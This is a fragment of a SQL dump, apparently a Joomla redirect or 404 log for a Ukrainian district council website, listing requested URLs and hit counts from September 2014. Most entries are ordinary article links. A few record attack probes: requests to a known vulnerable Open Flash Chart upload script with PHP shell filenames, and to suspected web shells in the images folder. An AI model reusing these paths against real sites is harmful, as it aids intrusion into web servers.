00:00:00',301),(4342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-23 03:40:45','0000-00-00 00:00:00',301),(4343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru','','','',2,0,'2014-09-23 03:48:46','0000-00-00 00:00:00',301),(4344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-23 03:55:09','0000-00-00 00:00:00',301),(4345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk','','','',2,0,'2014-09-23 04:01:29','0000-00-00 00:00:00',301),(4346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-23 04:09:24','0000-00-00 00:00:00',301),(4347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-23 04:24:52','0000-00-00 00:00:00',301),(4348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-23 04:29:25','0000-00-00 00:00:00',301),(4349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru','','','',2,0,'2014-09-23 04:32:14','0000-00-00 00:00:00',301),(4350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-23 04:35:38','0000-00-00 00:00:00',301),(4351,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-23 04:44:11','0000-00-00 00:00:00',301),(4352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=uk','','','',7,0,'2014-09-23 04:48:04','0000-00-00 00:00:00',301),(4353,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-23 04:56:02','0000-00-00 00:00:00',301),(4354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=ru','','','',5,0,'2014-09-23 04:59:58','0000-00-00 00:00:00',301),(4355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=ru','','','',4,0,'2014-09-23 05:00:25','0000-00-00 00:00:00',301),(4356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-23 05:00:28','0000-00-00 00:00:00',301),(4357,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-23 05:02:02','0000-00-00 00:00:00',301),(4358,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-23 05:05:21','0000-00-00 00:00:00',301),(4359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-23 05:09:28','0000-00-00 00:00:00',301),(4360,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-23 05:12:13','0000-00-00 00:00:00',301),(4361,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-23 05:12:30','0000-00-00 00:00:00',301),(4362,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=ru','','','',9,0,'2014-09-23 05:16:41','0000-00-00 00:00:00',301),(4363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru','','','',5,0,'2014-09-23 05:51:18','0000-00-00 00:00:00',301),(4364,'http://malyn-rayrada.org.ua/index.php/deputatska-storinka/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-23 05:59:30','0000-00-00 00:00:00',301),(4365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57:--15042014-&Itemid=98&lang=uk','','','',9,0,'2014-09-23 06:07:57','0000-00-00 00:00:00',301),(4366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=uk','','','',12,0,'2014-09-23 06:07:59','0000-00-00 00:00:00',301),(4367,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-23 06:10:34','0000-00-00 00:00:00',301),(4368,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-23 06:30:36','0000-00-00 00:00:00',301),(4369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-------3--------&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-23 06:34:55','0000-00-00 00:00:00',301),(4370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-23 06:42:56','0000-00-00 00:00:00',301),(4371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-09-23 06:45:13','0000-00-00 00:00:00',301),(4372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-09-23 07:03:34','0000-00-00 00:00:00',301),(4373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-23 07:10:15','0000-00-00 00:00:00',301),(4374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-23 07:10:18','0000-00-00 00:00:00',301),(4375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=uk','','','',4,0,'2014-09-23 07:15:33','0000-00-00 00:00:00',301),(4376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-23 07:17:14','0000-00-00 00:00:00',301),(4377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-23 07:25:52','0000-00-00 00:00:00',301),(4378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-23 07:40:56','0000-00-00 00:00:00',301),(4379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-23 07:42:22','0000-00-00 00:00:00',301),(4380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=ru','','','',3,0,'2014-09-23 07:43:58','0000-00-00 00:00:00',301),(4381,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-23 07:45:34','0000-00-00 00:00:00',301),(4382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-23 08:15:25','0000-00-00 00:00:00',301),(4383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-23 08:30:44','0000-00-00 00:00:00',301),(4384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-23 08:50:08','0000-00-00 00:00:00',301),(4385,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=en','','','',6,0,'2014-09-23 08:51:41','0000-00-00 00:00:00',301),(4386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-23 09:13:24','0000-00-00 00:00:00',301),(4387,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',22,0,'2014-09-23 09:19:09','0000-00-00 00:00:00',301),(4388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-23 09:26:09','0000-00-00 00:00:00',301),(4389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=uk','','','',13,0,'2014-09-23 10:17:24','0000-00-00 00:00:00',301),(4390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=ru','','','',7,0,'2014-09-23 10:54:02','0000-00-00 00:00:00',301),(4391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:----------------------2013-2017-&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-23 11:48:17','0000-00-00 00:00:00',301),(4392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-23 11:51:08','0000-00-00 00:00:00',301),(4393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46:--21122012&Itemid=85&lang=en','','','',2,0,'2014-09-23 13:02:41','0000-00-00 00:00:00',301),(4394,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1334:2014-06-06-05-54-20&tmpl=component&print=1&layout=default&page=&lang=uk','','','',4,0,'2014-09-23 14:22:44','0000-00-00 00:00:00',301),(4395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-23 14:29:10','0000-00-00 00:00:00',301),(4396,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-23 16:14:57','0000-00-00 00:00:00',301),(4397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-23 16:16:28','0000-00-00 00:00:00',301),(4398,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/393-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_8','',13,0,'2014-09-23 16:30:53','0000-00-00 00:00:00',301),(4399,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/742-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_4','',6,0,'2014-09-23 16:34:06','0000-00-00 00:00:00',301),(4400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-23 17:40:57','0000-00-00 00:00:00',301),(4401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru','','','',1,0,'2014-09-23 17:44:06','0000-00-00 00:00:00',301),(4402,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=en','','','',2,0,'2014-09-23 17:48:13','0000-00-00 00:00:00',301),(4403,'http://malyn-rayrada.org.ua/index.php/malinshchina-ta-malinchani/most-viewed','','','',1,0,'2014-09-23 18:02:42','0000-00-00 00:00:00',301),(4404,'http://www.malyn-rayrada.org.ua/administrator/undefined','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_jce&view=editor&layout=plugin&plugin=imgmanager_ext&wf25309ccea7c0c012deae088fff606','',6,0,'2014-09-23 18:13:14','0000-00-00 00:00:00',301),(4405,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=5:2010-06-05-12-51-34&option=com_content&Itemid=14&lang=uk','','','',2,0,'2014-09-23 19:47:56','0000-00-00 00:00:00',301),(4406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-23 19:54:33','0000-00-00 00:00:00',301),(4407,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-23 20:31:05','0000-00-00 00:00:00',301),(4408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-23 20:33:47','0000-00-00 00:00:00',301),(4409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-23 20:33:49','0000-00-00 00:00:00',301),(4410,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-23 20:37:30','0000-00-00 00:00:00',301),(4411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-23 20:45:15','0000-00-00 00:00:00',301),(4412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-23 20:46:38','0000-00-00 00:00:00',301),(4413,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-23 21:00:53','0000-00-00 00:00:00',301),(4414,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',53,0,'2014-09-23 21:25:01','0000-00-00 00:00:00',301),(4415,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',14,0,'2014-09-23 21:25:04','0000-00-00 00:00:00',301),(4416,'http://malyn-rayrada.org.ua/index.php?view=sitemap&id=1&Itemid=31&lang=uk','','','',1,0,'2014-09-23 21:29:12','0000-00-00 00:00:00',301),(4417,'http://malyn-rayrada.org.ua/index.php?view=section&layout=blog&id=6&Itemid=18&lang=uk','','','',1,0,'2014-09-23 21:29:17','0000-00-00 00:00:00',301),(4418,'http://malyn-rayrada.org.ua/index.php?view=section&layout=blog&id=4&Itemid=4&lang=uk','','','',1,0,'2014-09-23 21:29:21','0000-00-00 00:00:00',301),(4419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-23 22:29:24','0000-00-00 00:00:00',301),(4420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=uk','','','',9,0,'2014-09-23 23:06:47','0000-00-00 00:00:00',301),(4421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-23 23:17:58','0000-00-00 00:00:00',301),(4422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-23 23:40:11','0000-00-00 00:00:00',301),(4423,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-23 23:45:15','0000-00-00 00:00:00',301),(4424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-23 23:59:40','0000-00-00 00:00:00',301),(4425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-24 00:07:49','0000-00-00 00:00:00',301),(4426,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36&Itemid=70&lang=uk','','','',7,0,'2014-09-24 00:40:22','0000-00-00 00:00:00',301),(4427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-24 01:05:30','0000-00-00 00:00:00',301),(4428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk','','','',8,0,'2014-09-24 01:07:29','0000-00-00 00:00:00',301),(4429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en','','','',2,0,'2014-09-24 01:18:15','0000-00-00 00:00:00',301),(4430,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en','','','',2,0,'2014-09-24 01:20:25','0000-00-00 00:00:00',301),(4431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en','','','',4,0,'2014-09-24 01:20:31','0000-00-00 00:00:00',301),(4432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-24 01:32:09','0000-00-00 00:00:00',301),(4433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-24 01:32:24','0000-00-00 00:00:00',301),(4434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-24 01:34:12','0000-00-00 00:00:00',301),(4435,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=en','','','',24,0,'2014-09-24 01:45:27','0000-00-00 00:00:00',301),(4436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-24 02:06:06','0000-00-00 00:00:00',301),(4437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk','','','',5,0,'2014-09-24 02:12:39','0000-00-00 00:00:00',301),(4438,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-24 02:14:49','0000-00-00 00:00:00',301),(4439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-24 02:21:15','0000-00-00 00:00:00',301),(4440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36&Itemid=70&lang=en','','','',6,0,'2014-09-24 02:22:28','0000-00-00 00:00:00',301),(4441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:--21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-24 02:32:11','0000-00-00 00:00:00',301),(4442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:--21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-24 02:35:21','0000-00-00 00:00:00',301),(4443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-24 03:01:51','0000-00-00 00:00:00',301),(4444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-24 03:12:17','0000-00-00 00:00:00',301),(4445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru','','','',4,0,'2014-09-24 03:17:59','0000-00-00 00:00:00',301),(4446,'http://malyn-rayrada.org.ua/images/stories/food.php','','','',5,0,'2014-09-24 03:18:45','0000-00-00 00:00:00',301),(4447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-24 03:21:48','0000-00-00 00:00:00',301),(4448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-24 03:45:48','0000-00-00 00:00:00',301),(4449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-----lr--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-24 03:48:05','0000-00-00 00:00:00',301),(4450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru','','','',2,0,'2014-09-24 03:50:38','0000-00-00 00:00:00',301),(4451,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-24 04:19:07','0000-00-00 00:00:00',301),(4452,'http://www.malyn-rayrada.org.ua/images/stories/wawalo.php?rf','','','',1,0,'2014-09-24 04:40:39','0000-00-00 00:00:00',301),(4453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-24 04:40:50','0000-00-00 00:00:00',301),(4454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-24 04:40:57','0000-00-00 00:00:00',301),(4455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-24 04:42:00','0000-00-00 00:00:00',301),(4456,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=en','','','',4,0,'2014-09-24 04:43:10','0000-00-00 00:00:00',301),(4457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-24 04:59:28','0000-00-00 00:00:00',301),(4458,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en','','','',8,0,'2014-09-24 05:03:44','0000-00-00 00:00:00',301),(4459,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-24 05:13:53','0000-00-00 00:00:00',301),(4460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru','','','',2,0,'2014-09-24 05:14:33','0000-00-00 00:00:00',301),(4461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-24 05:29:33','0000-00-00 00:00:00',301),(4462,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-24 05:50:15','0000-00-00 00:00:00',301),(4463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-24 06:29:08','0000-00-00 00:00:00',301),(4464,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-24 07:13:50','0000-00-00 00:00:00',301),(4465,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-24 07:13:53','0000-00-00 00:00:00',301),(4466,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-24 07:13:55','0000-00-00 00:00:00',301),(4467,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-24 07:13:57','0000-00-00 00:00:00',301),(4468,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-24 07:13:59','0000-00-00 00:00:00',301),(4469,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-24 07:14:02','0000-00-00 00:00:00',301),(4470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=uk','','','',11,0,'2014-09-24 07:14:56','0000-00-00 00:00:00',301),(4471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-24 08:18:08','0000-00-00 00:00:00',301),(4472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:--19-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-24 09:00:40','0000-00-00 00:00:00',301),(4473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-24 09:08:47','0000-00-00 00:00:00',301),(4474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',19,0,'2014-09-24 09:08:50','0000-00-00 00:00:00',301),(4475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru','','http://www.google.ru/url?url=http://www.malyn-rayrada.org.ua/index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D1103%253A2013-10-03-09-29-30%26c','',6,0,'2014-09-24 09:12:13','0000-00-00 00:00:00',301),(4476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53&Itemid=94&lang=en','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Byandsearch%3Bweb%3B%3B&text=&etext=457.9MS5SilxmnO4vBz33WopgRfe1ZDFv-rCypr92rmITlxa7ER5ZN-Y7No2u-e_Ex1p','',2,0,'2014-09-24 09:18:07','0000-00-00 00:00:00',301),(4477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=ru','','','',4,0,'2014-09-24 10:15:04','0000-00-00 00:00:00',301),(4478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=uk','','','',37,0,'2014-09-24 10:20:46','0000-00-00 00:00:00',301),(4479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=uk','','','',2,0,'2014-09-24 10:21:12','0000-00-00 00:00:00',301),(4480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-24 10:21:15','0000-00-00 